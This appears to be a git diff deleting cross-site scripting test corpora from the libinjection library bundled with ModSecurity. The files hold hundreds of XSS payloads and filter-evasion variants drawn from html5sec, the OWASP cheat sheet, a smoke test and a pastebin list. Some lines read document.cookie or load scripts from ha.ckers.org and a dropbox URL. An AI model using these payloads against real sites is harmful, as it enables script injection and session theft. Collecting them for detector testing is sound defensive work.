test 68 <doc xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:html="http://www.w3.org/1999/xhtml"> <html:style /><x xlink:href="javascript:alert(1)" xlink:type="simple">XXX</x> </doc>
test 69 <card xmlns="http://www.wapforum.org/2001/wml"><onevent type="ontimer"><go href="javascript:alert(1)"/></onevent><timer value="1"/></card>
test 70 <div style=width:1px;filter:glow onfilterchange=alert(1)>x</div>
test 71 <// style=x:expression\28write(1)\29>
test 72 <form><button formaction="javascript:alert(1)">X</button>
test 73 <event-source src="event.php" onload="alert(1)">
test 74 <a href="javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A" /></a>
test 75 <script<{alert(1)}/></script </>
test 76_1 <?xml-stylesheet type="text/css"?><!DOCTYPE x SYSTEM "test.dtd"><x>&x;</x>
test 72_2 <!ENTITY x "&#x3C;html:img&#x20;src='x'&#x20;xmlns:html='http://www.w3.org/1999/xhtml'&#x20;onerror='alert(1)'/&#x3E;">
test 77 <?xml-stylesheet type="text/css"?><root style="x:expression(write(1))"/>
test 78 <?xml-stylesheet type="text/xsl" href="#"?><img xmlns="x-schema:test.xdr"/>
test 79 <object allowscriptaccess="always" data="test.swf"></object>
# test 80 TBD IE6 and halfwidth/fullwidth Unicode characters
test 81 <x xmlns:xlink="http://www.w3.org/1999/xlink" xlink:actuate="onLoad" xlink:href="javascript:alert(1)" xlink:type="simple"/>
test 82 <?xml-stylesheet type="text/css" href="data:,*%7bx:expression(write(2));%7d"?>
test 83 <x:template xmlns:x="http://www.wapforum.org/2001/wml" x:ontimer="$(x:unesc)j$(y:escape)a$(z:noecs)v$(x)a$(y)s$(z)cript$x:alert(1)"><x:timer value="1"/></x:template>
test 84 <x xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load" ev:handler="javascript:alert(1)//#x
test 85 <x xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load" ev:handler="test.evt#x"/>
test 86 <script xmlns="http://www.w3.org/1999/xhtml" id="x">alert(1)</script>
test 86 <body oninput=alert(1)><input autofocus>
test 87 <a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="javascript:alert(1)">
test 88_0 <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
test 88_1 <animation xlink:href="javascript:alert(1)"/>
test 88_2 <animation xlink:href="data:text/xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(1)'%3E%3C/svg%3E"/>
test 88_3 <image xlink:href="data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(1)'%3E%3C/svg%3E"/>
test 88_4 <foreignObject xlink:href="javascript:alert(1)"/>
test 88_5 <foreignObject xlink:href="data:text/xml,%3Cscript xmlns='http://www.w3.org/1999/xhtml'%3Ealert(1)%3C/script%3E"/>
test 89_1 <set attributeName="onmouseover" to="alert(1)"/>
test 89_2 <animate attributeName="onunload" to="alert(1)"/>
test 90_1 <div style=content:url(test2.svg)></div>
test 90_2 <div style="background:url(test5.svg)">PRESS ENTER</div>
test 90_3 <form xmlns="http://www.w3.org/1999/xhtml" target="_top" action="javascript:alert(1)"> <!-- this file can be crossdomain if "action" attribute refers to an external file --> <meta http-equiv="refresh" content="1;URL=test5.svg"/> <input type="submit" autofocus="autofocus"/> </form>
# test 91
test 91_1 <? foo="><script>alert(1)</script>">
test 91_2 <! foo="><script>alert(1)</script>">
test 91_3 </ foo="><script>alert(1)</script>">
# obsolete Safari 4
#test 91_4 <? foo="><x foo='?><script>alert(1)</script>'>">
# obsolete Opera 11
#test 91_5 <! foo="[[[x]]"><x foo="]foo><script>alert(1)</script>">
test 91_6 <%25 foo><x foo="%25><script>alert(1)</script>">
test 92 <div style="background:url(http://foo.f/f oo/;color:red/*/foo.jpg);">X</div>
test 93 <div style="list-style:url(http://foo.f)\20url(javascript:alert(1));">X</div>
test 94_1 <handler xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load">alert(1)</handler>
test 94_2 <svg xmlns="http://www.w3.org/2000/svg"> <handler xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load">alert(1)</handler> </svg>
test 95_1 <feImage> <set attributeName="xlink:href" to="data:image/svg+xml;charset=utf-8;base64, PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPjxzY3JpcHQ%2BYWxlcnQoMSk8L3NjcmlwdD48L3N2Zz4NCg%3D%3D"/> </feImage>
test 95_2 <set attributeName="xlink:href" to="data:image/svg+xml;charset=utf-8;base64, PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPjxzY3JpcHQ%2BYWxlcnQoMSk8L3NjcmlwdD48L3N2Zz4NCg%3D%3D"/>
test 96_1 <iframe src=mhtml:http://html5sec.org/test.html!xss.html></iframe>
test 96_2 <iframe src=mhtml:http://html5sec.org/test.gif!xss.html></iframe>
test 97_1 <div id=d><x xmlns="><iframe onload=alert(1)"></div> <script>d.innerHTML+='';</script>
test 97_2 <div id=d><x xmlns='"><iframe onload=alert(2)//'></div> <script>d.innerHTML+='';</script>
test 98 <div id=d><div style="font-family:'sans\27\2F\2A\22\2A\2F\3B color\3Ared\3B'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script>
test 99 XXX<style> *{color:gre/**/en !/**/important} /* IE 6-9 Standards mode */ <!-- --><!--*{color:red} /* all UA */ *{background:url(xx:x //**/\red/*)} /* IE 6-7 Standards mode */ </style>
# <img[a][b]src=x[d]onerror[c]=[e]"alert(1)">
#
# normal case
test 100_0 <img src=x onerror="alert(1)">
# [a]case
test 100_1 <img%09src=x onerror="alert(1)">
test 100_2 <img%0Asrc=x onerror="alert(1)">
test 100_3 <img%0Csrc=x onerror="alert(1)">
test 100_4 <img%0Dsrc=x onerror="alert(1)">
test 100_5 <img%20src=x onerror="alert(1)">
test 100_6 <img%47src=x onerror="alert(1)">
test 100_7 <img%0Bsrc=x onerror="alert(1)">
# [b] case
test 100_8 <img %47src=x onerror="alert(1)">
test 100_9 <img %00src=x onerror="alert(1)">
# [c] case
test 100_10 <img src=x onerror%09="alert(1)">
test 100_11 <img src=x onerror%0A="alert(1)">
test 100_12 <img src=x onerror%0C="alert(1)">
test 100_13 <img src=x onerror%0D="alert(1)">
test 100_14 <img src=x onerror%20="alert(1)">
test 100_15 <img src=x onerror%00="alert(1)">
test 100_16 <img src=x onerror%0B="alert(1)">
# [d] case
test 100_17 <img src=x%09onerror="alert(1)">
test 100_18 <img src=x%0Aonerror="alert(1)">
test 100_19 <img src=x%0Conerror="alert(1)">
test 100_20 <img src=x%0Donerror="alert(1)">
test 100_21 <img src=x%20onerror="alert(1)">
test 100_22 <img src=x%0Bonerror="alert(1)">
# [e] case
test 100_23 <img src=x onerror=%09"alert(1)">
test 100_24 <img src=x onerror=%0A"alert(1)">
test 100_25 <img src=x onerror=%0C"alert(1)">
test 100_26 <img src=x onerror=%0D"alert(1)">
test 100_27 <img src=x onerror=%20"alert(1)">
test 100_28 <img src=x onerror=%00"alert(1)">
test 100_29 <img src=x onerror=%0B"alert(1)">
# <a href="[a]java[b]script[c]:alert(1)">XXX</a>
test 101_x <a href="javascript:alert(1)">XXX</a>
test 101_0 <a href="%00javascript:alert(1)">XXX</a>
test 101_1 <a href="%01javascript:alert(1)">XXX</a>
test 101_2 <a href="%02javascript:alert(1)">XXX</a>
test 101_3 <a href="%03javascript:alert(1)">XXX</a>
test 101_4 <a href="%04javascript:alert(1)">XXX</a>
test 101_5 <a href="%05javascript:alert(1)">XXX</a>
test 101_6 <a href="%06javascript:alert(1)">XXX</a>
test 101_7 <a href="%07javascript:alert(1)">XXX</a>
test 101_8 <a href="%08javascript:alert(1)">XXX</a>
test 101_9 <a href="%09javascript:alert(1)">XXX</a>
test 101_10 <a href="%0Ajavascript:alert(1)">XXX</a>
test 101_11 <a href="%0Bjavascript:alert(1)">XXX</a>
test 101_12 <a href="%0Cjavascript:alert(1)">XXX</a>
test 101_13 <a href="%0Djavascript:alert(1)">XXX</a>
test 101_14 <a href="%0Ejavascript:alert(1)">XXX</a>
test 101_15 <a href="%0Fjavascript:alert(1)">XXX</a>
test 101_16 <a href="%10javascript:alert(1)">XXX</a>
test 101_17 <a href="%11javascript:alert(1)">XXX</a>
test 101_18 <a href="%12javascript:alert(1)">XXX</a>
test 101_19 <a href="%13javascript:alert(1)">XXX</a>
test 101_20 <a href="%14javascript:alert(1)">XXX</a>
test 101_21 <a href="%15javascript:alert(1)">XXX</a>
test 101_22 <a href="%16javascript:alert(1)">XXX</a>
test 101_23 <a href="%17javascript:alert(1)">XXX</a>
test 101_24 <a href="%18javascript:alert(1)">XXX</a>
test 101_25 <a href="%19javascript:alert(1)">XXX</a>
test 101_26 <a href="%1Ajavascript:alert(1)">XXX</a>
test 101_27 <a href="%1Bjavascript:alert(1)">XXX</a>
test 101_28 <a href="%1Cjavascript:alert(1)">XXX</a>
test 101_29 <a href="%1Djavascript:alert(1)">XXX</a>
test 101_30 <a href="%1Ejavascript:alert(1)">XXX</a>
test 101_31 <a href="%1Fjavascript:alert(1)">XXX</a>
test 101_32 <a href="%20javascript:alert(1)">XXX</a>
# B -- other cases are obsolete
test 101_33 <a href="j%00avascript:alert(1)">XXX</a>
# Confirmed in IE8, Does not work in IE9+
test 102 <img src="x` `<script>alert(1)</script>"` `>
test 103 <script>history.pushState(0,0,'/i/am/somewhere_else');</script>
test 104 <svg xmlns="http://www.w3.org/2000/svg" id="foo"> <x xmlns="http://www.w3.org/2001/xml-events" event="load" observer="foo" handler="data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0A%3Chandler%20xml%3Aid%3D%22bar%22%20type%3D%22application%2Fecmascript%22%3E alert(1) %3C%2Fhandler%3E%0A%3C%2Fsvg%3E%0A#bar"/> </svg>
test 105 <iframe src="data:image/svg-xml,%1F%8B%08%00%00%00%00%00%02%03%B3)N.%CA%2C(Q%A8%C8%CD%C9%2B%B6U%CA())%B0%D2%D7%2F%2F%2F%D7%2B7%D6%CB%2FJ%D77%B4%B4%B4%D4%AF%C8(%C9%CDQ%B2K%CCI-*%D10%D4%B4%D1%87%E8%B2%03"></iframe>
# Safari 4, supported 2005-2010, now obsolete
# test 106 <img src onerror /" '"= alt=alert(1)//">
test 107 <title onpropertychange=alert(1)></title><title title=></title>
test 108_1 <a href=http://foo.bar/#x=`y></a><img alt="`><img src=xx:x onerror=alert(1)></a>">
test 108_2 <!a foo=x=`y><img alt="`><img src=xx:x onerror=alert(2)//">
test 108_3 <?a foo=x=`y><img alt="`><img src=xx:x onerror=alert(3)//">
# test 109 SVG
test 110_1 <svg xmlns="http://www.w3.org/2000/svg"> <path d="M0,0" style="marker-start:url(test4.svg#a)"/> </svg>
test 110_2 <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <marker id="a" markerWidth="1000" markerHeight="1000" refX="0" refY="0"> <a xlink:href="http://google.com"> <set attributeName="xlink:href" to="javascript:alert(1)" begin="1s" /> <rect width="1000" height="1000" fill="white"/> </a> </marker> </svg>
test 111 <div style="background:url(/f#[a]oo/;color:red/*/foo.jpg);">X</div>
test 112 <div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X</div>
test 113 <div id="x">XXX</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style>
test 114 <x style="background:url('x[a];color:red;/*')">XXX</x>
test 115_1 <!--[if]><script>alert(1)</script -->
test 115_2 <!--[if<img src=x onerror=alert(2)//]> -->
test 116_1 <import namespace="t" implementation="#default#time2">
test 116_2 <?import namespace="t" implementation="#default#time2">
test 117 <a href="http://attacker.org"> <iframe src="http://example.org/"></iframe> </a>
test 118 <div draggable="true" ondragstart="event.dataTransfer.setData('text/plain','malicious code');"> <h1>Drop me</h1> </div>
test 119 <iframe src="view-source:http://www.example.org/" frameborder="0" style="width:400px;height:180px"></iframe>
test 120 <a href="#" onclick="makePopups()">Spam</a>
# original for SVG masking
# repurposing this as a generic "no SVG"
test 121_1 <svg:svg>
test 121_2 <svg>
test 121_3 <svg:mast id="foo">
test 122 <iframe sandbox="allow-same-origin allow-forms allow-scripts" src="http://example.org/"></iframe>
# test 123 "class jacking with jquery" http://html5sec.org/#131, requires scripting
test 124_1 <script src="/\example.com\foo.js"></script> // Safari 5.0, Chrome 9, 10
test 124_2 <script src="\\example.com\foo.js"></script> // Safari 5.0
test 125 <xsl:stylesheet id="stylesheet" version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
test 126_1 <object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object>
test 127_2 <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object>
test 127_1 <svg xmlns="http://www.w3.org/2000/svg" id="x"> <listener event="load" handler="#y" xmlns="http://www.w3.org/2001/xml-events" observer="x"/> <handler id="y">alert(1)</handler> </svg>
test 127_2 <handler id="y">alert(1)</handler>
test 127_3 <listener event="load" handler="#y" xmlns="http://www.w3.org/2001/xml-events" observer="x"/>
test 128 <svg><style>&lt;img/src=x onerror=alert(1)// </b>
test 129_1 <image style='filter:url("data:image/svg+xml,<svg xmlns=%22http://www.w3.org/2000/svg%22><script>parent.alert(1)</script></svg>")'>
test 129_2 <image filter='filter:url("data:image/svg+xml,<svg xmlns=%22http://www.w3.org/2000/svg%22><script>parent.alert(1)</script></svg>")'>
test 130_1 <math href="javascript:alert(1)">CLICKME</math>
test 130_2 <math><maction actiontype="statusline#http://google.com" xlink:href="javascript:alert(2)">CLICKME</maction>
test 130_3 <math><maction actiontype="statusline" xlink:href="javascript:alert(3)">CLICKME<mtext>http://http://google.com</mtext></maction> </math>
# Obsolete FF < 10
#test 131 TBD Drag and Drop http://html5sec.org/#131
test 132_1 <set attributeName="xlink:href" begin="accessKey(a)" to="//example.com/?a" />
test 132_2 <svg height="50px"> <image xmlns:xlink="http://www.w3.org/1999/xlink"> <set attributeName="xlink:href" begin="accessKey(a)" to="//example.com/?a" /> <set attributeName="xlink:href" begin="accessKey(b)" to="//example.com/?b" /> <set attributeName="xlink:href" begin="accessKey(c)" to="//example.com/?c" /> <set attributeName="xlink:href" begin="accessKey(d)" to="//example.com/?d" /> </image>
test 133 <!-- `<img/src=xx:xx onerror=alert(1)//--!>
test 134_1 <xmp> <%25 </xmp> <img alt='%25></xmp><img src=xx:x onerror=alert(1)//'>
test 134_2 <script> x='<%25' </script> %25>/ alert(2) </script>
test 134_3 XXX <style> *['<!--']{} </style> -->{} *{color:red}</style>
test 135 <!-- `<img/src=xx:xx onerror=alert(1)//--!>
# Somewhat odd injection -- ignoring. We can ban dirname is this
# is really a problem
#test 136 <input name="injected" value="injected" dirname="password" />
test 137_1 <animate attributeName="xlink:href" begin="0" from="javascript:alert(1)" to="&" />
test 137_2 <svg> <a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="?"> <circle r="400"></circle> <animate attributeName="xlink:href" begin="0" from="javascript:alert(1)" to="&" /> </a>

7
src/deps/src/ModSecurity/others/libinjection/data/xss-mgentile-2013.txt
View File

@ -1,7 +0,0 @@
# Mauro Gentile
# https://www.owasp.org/images/7/7c/Gentile_OWASP_EU_Tour_2013.pdf
<input onfocus=write(1) autofocus>
<form id="test" /><button form="test" formaction="javascript:alert(1)">X</button>
<video><source onerror="alert(1)">
<form><button><button form="test" formaction="javascript:alert(1)">X</button>
<script/src=data

2
src/deps/src/ModSecurity/others/libinjection/data/xss-modsecurity-2013-1.txt
View File

@ -1,2 +0,0 @@
# http://blog.spiderlabs.com/2013/09/modsecurity-xss-evasion-challenge-results.html
<scr%00ipt>confirm(0);</scr%00ipt>

3
src/deps/src/ModSecurity/others/libinjection/data/xss-modsecurity-2013-2.txt
View File

@ -1,3 +0,0 @@
# http://blog.spiderlabs.com/2013/09/modsecurity-xss-evasion-challenge-results.html
%3Cscript%3Edocument.body.innerHTML=%22%3Ca%20onmouseover%0B=location=%27\x6A\x61\x76\x61\x53\x43\x52\x49\x50\x54\x26\x63\x6F\x6C\x6F\x6E\x3B\x63\x6F\x6E\x66\x69\x72\x6D\x26\x6C\x70\x61\x72\x3B\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x63\x6F\x6F\x6B\x69\x65\x26\x72\x70\x61\x72\x3B%27%3E%3Cinput%20name=attributes%3E%22;%3C/script%3E

259
src/deps/src/ModSecurity/others/libinjection/data/xss-owasp-cheatsheet-20131120.txt
View File

@ -1,259 +0,0 @@
#
# https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
# based on the RSnake original http://ha.ckers.org/xss.html
# Retrieved on 2013-11-20
# Much of this wildly obsolete
#
# XSS Locator 2
'';!--"<XSS>=&{()}
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=JaVaScRiPt:alert('XSS')>
# Grave Accent Obfuscation
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
# Malformed A Tags
# (not actually malformed)
<a onmouseover="alert(document.cookie)">xxs link</a>
<a onmouseover=alert(document.cookie)>xxs link</a>
# Malformed IMG Tags
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
# fromCharCode
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
# Default SRC tag to get past filters that check SRC domain
<IMG SRC=# onmouseover="alert('xxs')">
# Default SRC tag by leaving it empty
# nickg; Unable to replicate in FF,Safari,Chrome 2014-01-10
# <IMG SRC= onmouseover="alert('xxs')">
# Default SRC tag by leaving it out entirely
<IMG onmouseover="alert('xxs')">
# Decimal HTML character references
# obsolete?
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
<IMG SRC="/" onerror=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
# Decimal HTML character references without trailing semicolons
# obsolete
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
<IMG SRC="/x" onerror=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
# Hexadecimal HTML character references without trailing semicolons
# obsolete form
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
<IMG SRC="/" onerror=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
# Embedded tab
# obsolete form
#<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="/x" onerror="jav ascript:alert('XSS');">
# Embedded escaped tab
# obsolete form
#<IMG SRC="jav&#x09;ascript:alert('XSS');">
<IMG SRC="/" onerror="jav&#x09;ascript:alert('XSS');">
# Embedded newline to break up XSS
# obsolete form
#<IMG SRC="jav&#x0A;ascript:alert('XSS');">
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
# Embedded CR
# obsolete form
#<IMG SRC="jav&#x0D;ascript:alert('XSS');">
<IMG SRC="/x" onerror="jav&#x0D;ascript:alert('XSS');">
# Null
# obsolete form
# <IMG SRC="jav%00ascript:alert('XSS');">
<IMG SRC="/x" onerror="jav%00ascript:alert('XSS');">
# Spaces and meta chars before the JavaScript in images for XSS
# obsolete form
#<IMG SRC=" &#14; javascript:alert('XSS');">
<IMG SRC="/x" onerror=" &#14; javascript:alert('XSS');">
# Non-alpha-non-digit XS
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
# this is bogus or obsolete
# <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
# Extraneous open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>
# No closing script tags
<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >
# Protocol resolution in script tags
<SCRIPT SRC=//ha.ckers.org/.j>
# Half open HTML/JavaScript XSS vector
<IMG SRC="javascript:alert('XSS')"
# Double open angle brackets
<iframe src=http://ha.ckers.org/scriptlet.html <
# Escaping JavaScript escapes
# N/A
# End title tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
# INPUT image
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
# BODY image
<BODY BACKGROUND="javascript:alert('XSS')">
# IMG Dynsrc
# Wildly obsolete
<IMG DYNSRC="javascript:alert('XSS')">
# IMG LOW src
# Wildy obsolete
<IMG LOWSRC="javascript:alert('XSS')">
# List-style-image
# likely obsolete
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>
# VBscript in an image
<IMG SRC='vbscript:msgbox("XSS")'>
# Livescript (older versions of Netscape only)
# Obsolete
# <IMG SRC="livescript:[code]">
# BODY tag
<BODY ONLOAD=alert('XSS')>
# BGSOUND
<BGSOUND SRC="javascript:alert('XSS');"
# & JavaScript includes
# Obsolete
# <BR SIZE="&{alert('XSS')}">
# STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
# Remote style sheet
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
# Remote style sheet part 2
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
# Remote style sheet part 3
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
# Remote style sheet part 4
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
# STYLE tags with broken up JavaScript for XSS
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
# STYLE attribute using a comment to break up expression
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"
# IMG STYLE with expression
# N/A
# STYLE tag (Older versions of Netscape only)
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
# STYLE tag using background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
# STYLE tag using background
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
# Anonymous HTML with STYLE attribute
<XSS STYLE="xss:expression(alert('XSS'))">
# Local htc file
<XSS STYLE="behavior: url(xss.htc);">
# META
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
# META using data
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
# META
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
# IFRAME
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
# IFRAME Event based
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
# FRAME
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
# TABLE
<TABLE BACKGROUND="javascript:alert('XSS')">
# TD
<TABLE BACKGROUND="javascript:alert('XSS')">
# DIV background-image
<TABLE BACKGROUND="javascript:alert('XSS')">
# DIV background-image with unicoded XSS exploit
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.
# DIV background-image plus extra characters
<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">
# DIV expression
<DIV STYLE="width: expression(alert('XSS'));">
# "Downlevel-hidden block"
<!--[if gte IE 4]> <SCRIPT>alert('XSS');</SCRIPT> <![endif]-->
# BASE tag
<BASE HREF="javascript:alert('XSS');//">
# Object tag
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
# Using an EMBED tag you can embed a Flash movie that contains XSS
<EMBED SRC="http://ha.ckers.Using an EMBED tag you can embed a Flash movie that contains XSS. Click here for a demo. If you add the attributes allowScriptAccess="never" and allownetworking="internal" it can mitigate this risk (thank you to Jonathan Vanasco for the info).:org/xss.swf" AllowScriptAccess="always"></EMBED>
# You can EMBED SVG which can contain your XSS vector
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
# Using ActionScript inside flash can obfuscate your XSS vector
# N/A
# XML data island with CDATA obfuscation
<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
# Locally hosted XML with embedded JavaScript that is generated using an XML data island
<XML SRC="xsstest.xml" ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
# XSS using HTML quote encapsulatio
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

79561
src/deps/src/ModSecurity/others/libinjection/data/xss-shazzer.txt
View File

File diff suppressed because it is too large Load Diff

86
src/deps/src/ModSecurity/others/libinjection/data/xss-smoke-test.txt
View File

@ -1,86 +0,0 @@
#
# Really simple XSS smoke test
#
#
# Script Tags
#
# in plain text context - duh
<script>alert(1);</script>
# as attribute <tag $USERINPUT></tag>
><script>alert(1);</script>
# as unquoted value <tag foo=$USERINPUT></tag>
x ><script>alert(1);</script>
# as single quoted value <tag foo='$USERINPUT'></tag>
' ><script>alert(1);</script>
# as double quoted value <tag foo="$USERINPUT"></tag>
"><script>alert(1);</script>
# inside <style>div:color=$USERINPUT;.. </style>
red;</style><script>alert(1);</script>
# inside <style>div { color=$USERINPUT;..} </style>
red;}</style><script>alert(1);</script>
# inside <div style="color:$USERINPUT"...
red;"/><script>alert(1);</script>
# inside CSS URL, e.g. background-image:url('$USERINPUT')
');}</style><script>alert(1);</script>
#
# onerror (or on-other)
#
# as attribute <tag $USERINPUT></tag>
onerror=alert(1)>
# as unquoted value <tag foo=$USERINPUT></tag>
x onerror=alert(1);>
# as single quoted value <tag foo='$USERINPUT'></tag>
x' onerror=alert(1);>
# as double quoted value <tag foo='$USERINPUT'></tag>
x" onerror=alert(1);>
#
# href-like
#
# duh
<a href="javascript:alert(1)">
<a href='javascript:alert(1)'>
<a href=javascript:alert(1)>
<a href = javascript:alert(1); >
<a href=" javascript:alert(1);" >
<a href="JAVASCRIPT:alert(1);" >
<a href="&#32;javascript:alert(1)" >
<a href="&#00032;javascript:alert(1)" >
<a href="&#x20;javascript:alert(1)" >
# does not work
#<a href="&nbsp;javascript:alert(1)" >
<a href="&#X20;javascript:alert(1)" >
<a href="&#74;avascript:alert(1)" >
<a href="&#000074;avascript:alert(1)" >
# really a raw embedded null
<a href="j&#0;avascript:alert(1)">

105
src/deps/src/ModSecurity/others/libinjection/data/xss-soaj1664ashar-pastebin-u6FY1xDA.txt
View File

@ -1,105 +0,0 @@
# http://slid.es/mscasharjaved/cross-site-scripting-my-love
# http://pastebin.com/u6FY1xDA
# @soaj1664ashar
#
1) <iframe %00 src="&Tab;javascript:prompt(1)&Tab;"%00>
2) <svg><style>{font-family&colon;'<iframe/onload=confirm(1)>'
3) <input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;"
4) <sVg><scRipt %00>alert&lpar;1&rpar; {Opera}
5) <img/src=`%00` onerror=this.onerror=confirm(1)
6) <form><isindex formaction="javascript&colon;confirm(1)"
7) <img src=`%00`&NewLine; onerror=alert(1)&NewLine;
8) <script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script>
9) <ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
10) <iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
11) <script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/
12) &#34;&#62;<h1/onmouseover='\u0061lert(1)'>%00
13) <iframe/src="data:text/html,<svg &#111;&#110;load=alert(1)>">
14) <meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/>
